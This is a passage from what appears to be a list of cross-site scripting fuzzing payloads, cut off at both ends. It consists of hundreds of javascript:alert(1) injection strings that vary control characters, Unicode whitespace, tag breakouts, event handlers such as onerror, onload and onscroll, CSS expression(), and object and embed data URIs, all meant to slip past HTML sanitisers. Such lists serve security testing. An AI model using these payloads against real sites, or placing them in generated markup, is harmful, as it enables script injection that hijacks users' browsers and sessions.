style="x:\\xE2\\x80\\x85expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x82expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Bexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x81expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x83expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x89expression(javascript:alert(1)">DEF', '<a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', '`"\'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x22onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x0Donerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x09onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x0Conerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x00onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x27onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x20onerror=javascript:alert(1)>', '`"\'><img src=x onerror=javascript:alert(&#039;1&#039;)>', '"><img src=x onerror=javascript:alert(&#039;1&#039;)>', "'><img src=x onerror=javascript:alert(&#039;1&#039;)>", '<img src=x onerror=javascript:alert(&#039;1&#039;)>', '"><img src=x onerror=javascript:alert(&#039;1&#039;)>', "'><img src=x onerror=javascript:alert(&#039;1&#039;)>", '"`\'><script>\\x3Bjavascript:alert(1)</script>', '"`\'><script>\\x0Djavascript:alert(1)</script>', '"`\'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x81javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x84javascript:alert(1)</script>', '"`\'><script>\\xE3\\x80\\x80javascript:alert(1)</script>', '"`\'><script>\\x09javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x89javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x85javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x88javascript:alert(1)</script>', '"`\'><script>\\x00javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>', '"`\'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>', '"`\'><script>\\x0Cjavascript:alert(1)</script>', '"`\'><script>\\x2Bjavascript:alert(1)</script>', '"`\'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>', '"`\'><script>-javascript:alert(1)</script>', '"`\'><script>\\x0Ajavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>', '"`\'><script>\\x7Ejavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x87javascript:alert(1)</script>', '"`\'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>', '"`\'><script>\\xC2\\x85javascript:alert(1)</script>', '"`\'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x83javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>', '"`\'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x80javascript:alert(1)</script>', '"`\'><script>\\x21javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x82javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x86javascript:alert(1)</script>', '"`\'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>', '"`\'><script>\\x0Bjavascript:alert(1)</script>', '"`\'><script>\\x20javascript:alert(1)</script>', '"`\'><script>\\xC2\\xA0javascript:alert(1)</script>', '"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', '"><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', "'><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />", '"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', '"><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', "'><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />", '"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', '"><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', "'><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />", '"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', '"><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', "'><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />", '"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', '"><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', "'><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />", '"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', '"><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', "'><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />", '"/><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', '"><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', "'><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />", '"/><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', '"><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', "'><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />", '"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', '"><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', "'><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />", '<img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', '"><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', "'><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />", '<img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', '"><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', "'><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />", '<img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', '"><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', "'><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />", '<img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', '"><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', "'><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />", '<img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', '"><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', "'><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />", '<img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', '"><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', "'><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />", '<img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', '"><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', "'><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />", '<img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', '"><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', "'><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />", '<img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', '"><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', "'><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />", '<script\\x2F>javascript:alert(1)</script>', '"><script\\x2F>javascript:alert(1)</script>', "'><script\\x2F>javascript:alert(1)</script>", '<script\\x20>javascript:alert(1)</script>', '"><script\\x20>javascript:alert(1)</script>', "'><script\\x20>javascript:alert(1)</script>", '<script\\x0D>javascript:alert(1)</script>', '"><script\\x0D>javascript:alert(1)</script>', "'><script\\x0D>javascript:alert(1)</script>", '<script\\x0A>javascript:alert(1)</script>', '"><script\\x0A>javascript:alert(1)</script>', "'><script\\x0A>javascript:alert(1)</script>", '<script\\x0C>javascript:alert(1)</script>', '"><script\\x0C>javascript:alert(1)</script>', "'><script\\x0C>javascript:alert(1)</script>", '<script\\x00>javascript:alert(1)</script>', '"><script\\x00>javascript:alert(1)</script>', "'><script\\x00>javascript:alert(1)</script>", '<script\\x09>javascript:alert(1)</script>', '"><script\\x09>javascript:alert(1)</script>', "'><script\\x09>javascript:alert(1)</script>", '`"\'><img src=xxx:x onerror\\x0B=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x00=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x0C=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x0D=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x20=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x0A=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x09=javascript:alert(1)>', '<script>javascript:alert(1)<\\x00/script>', '</ScrIpt><script>javascript:alert(1)<\\x00/script>', '"><script>javascript:alert(1)<\\x00/script>', '</ScrIpt><script>javascript:alert(1)<\\x00/script>', "'><script>javascript:alert(1)<\\x00/script>", '</ScrIpt><script>javascript:alert(1)<\\x00/script>', '<img src=# onerror\\x3D"javascript:alert(1)" >', '"><img src=# onerror\\x3D"javascript:alert(1)" >', '\'><img src=# onerror\\x3D"javascript:alert(1)" >', '<video poster=javascript:javascript:alert(1)//', '"><video poster=javascript:javascript:alert(1)//', "'><video poster=javascript:javascript:alert(1)//", '<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X', '"><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X', "'><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X", '<video><source onerror="javascript:javascript:alert(1)">', '"><video><source onerror="javascript:javascript:alert(1)">', '\'><video><source onerror="javascript:javascript:alert(1)">', '<video onerror="javascript:javascript:alert(1)"><source>', '"><video onerror="javascript:javascript:alert(1)"><source>', '\'><video onerror="javascript:javascript:alert(1)"><source>', '<form><button formaction="javascript:javascript:alert(1)">X', '"><form><button formaction="javascript:javascript:alert(1)">X', '\'><form><button formaction="javascript:javascript:alert(1)">X', '<body oninput=javascript:alert(1)><input autofocus>', '"><body oninput=javascript:alert(1)><input autofocus>', "'><body oninput=javascript:alert(1)><input autofocus>", '<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>', '"><math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>', '\'><math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>', '<frameset onload=javascript:alert(1)>', '"><frameset onload=javascript:alert(1)>', "'><frameset onload=javascript:alert(1)>", '<table background="javascript:javascript:alert(1)">', '"><table background="javascript:javascript:alert(1)">', '\'><table background="javascript:javascript:alert(1)">', '<!--<img src="--><img src=x onerror=javascript:alert(1)//">', '"><!--<img src="--><img src=x onerror=javascript:alert(1)//">', '\'><!--<img src="--><img src=x onerror=javascript:alert(1)//">', '<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">', '"><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">', '\'><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">', '<![><img src="]><img src=x onerror=javascript:alert(1)//">', '"><![><img src="]><img src=x onerror=javascript:alert(1)//">', '\'><![><img src="]><img src=x onerror=javascript:alert(1)//">', '<style><img src="</style><img src=x onerror=javascript:alert(1)//">', '"><style><img src="</style><img src=x onerror=javascript:alert(1)//">', '\'><style><img src="</style><img src=x onerror=javascript:alert(1)//">', '<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>', '"><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>', "'><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>", '<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>', '"><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>', '\'><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>', '<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>', '"><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>', "'><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>", '<object data="data:text/html;base64,%(base64)s">', '"><object data="data:text/html;base64,%(base64)s">', '\'><object data="data:text/html;base64,%(base64)s">', '<embed src="data:text/html;base64,%(base64)s">', '"><embed src="data:text/html;base64,%(base64)s">', '\'><embed src="data:text/html;base64,%(base64)s">', '<b <script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>0', '<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '"><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '\'><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '<x \'="foo"><x foo=\'><img src=x 